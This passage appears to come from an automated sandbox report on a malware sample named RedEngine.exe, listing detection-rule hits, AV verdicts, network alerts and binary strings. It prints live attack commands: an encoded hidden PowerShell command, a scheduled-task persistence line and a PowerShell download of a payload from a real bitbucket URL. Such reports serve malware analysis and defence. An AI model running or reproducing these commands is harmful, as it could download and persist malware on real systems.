jAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, ProcessId: 7828, ProcessName: schtasks.exe
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7972, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        Source: Process started | Author: Joe Security | Data: Command: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, ProcessId: 7828, ProcessName: schtasks.exe
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-09-05T01:03:11.390861+0200 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.7 | 49711 | 185.166.143.50 | 443 | TCP

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-09-05T01:03:11.390861+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49711 | 185.166.143.50 | 443 | TCP
                        2024-09-05T01:03:12.712325+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49712 | 185.166.143.50 | 443 | TCP

                        AV Detection

                        Source: RedEngine.exe | Avira: detected
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | ReversingLabs: Detection: 60%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | ReversingLabs: Detection: 60%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | ReversingLabs: Detection: 41%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | ReversingLabs: Detection: 60%
                        Source: RedEngine.exe | ReversingLabs: Detection: 68%
                        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                        Source: RedEngine.exe | Joe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_648E6000 PyCMethod_New,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,clock,clock,clock,clock,CryptReleaseContext

                        Compliance

                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | Unpacked PE file: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack
                        Source: RedEngine.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49709 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49730 version: TLS 1.2
                        Source: RedEngine.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3808593718.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp, clppth.exe, 00000026.00000003.1855125182.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1948258796.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3803291292.00007FFB041BF000.00000002.00000001.01000000.00000022.sdmp, clppth.exe, 00000029.00000003.2059501286.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3809366779.00007FFB226D1000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848674222.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1932878487.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3804653921.00007FFB0B48E000.00000002.00000001.01000000.0000001C.sdmp, clppth.exe, 00000026.00000003.1847327209.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1930590183.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != 
NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02479000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3806016882.00007FFB0B4D8000.00000002.00000001.01000000.00000018.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809064972.00007FFB1E3B9000.00000002.00000001.01000000.00000013.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1941486532.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3806753681.00007FFB23AD9000.00000002.00000001.01000000.0000002B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3807780292.00007FFB1BA6D000.00000002.00000001.01000000.00000015.sdmp, clppth.exe, 0000002A.00000002.3805477731.00007FFB23A9D000.00000002.00000001.01000000.0000002D.sdmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC85A0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 14_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BC85A0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B985A0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 38_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B985A0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe | Code function: 42_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.tmp
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\AppData\Local\
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe | File opened: C:\Users\user~1\AppData\
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A74385h | 11_2_00A74318
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 11_2_00A72CC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A708AEh | 11_2_00A70869
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A708AEh | 11_2_00A70878
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A74385h | 11_2_00A74307
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A783A3h | 11_2_00A78368
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 00A783A3h | 11_2_00A78359
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 11_2_00A72CB9
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 11_2_00A71EAD
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h | 11_2_00A71EB8
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 049D5796h | 11_2_049D5760
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe | Code function: 4x nop then jmp 049D5796h | 11_2_049D5750

                        Networking

                        Source: Network traffic | Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49711 -> 185.166.143.50:443
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45949D000.00000004.00000800.00020000.00000000.sdmpString found in memory: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
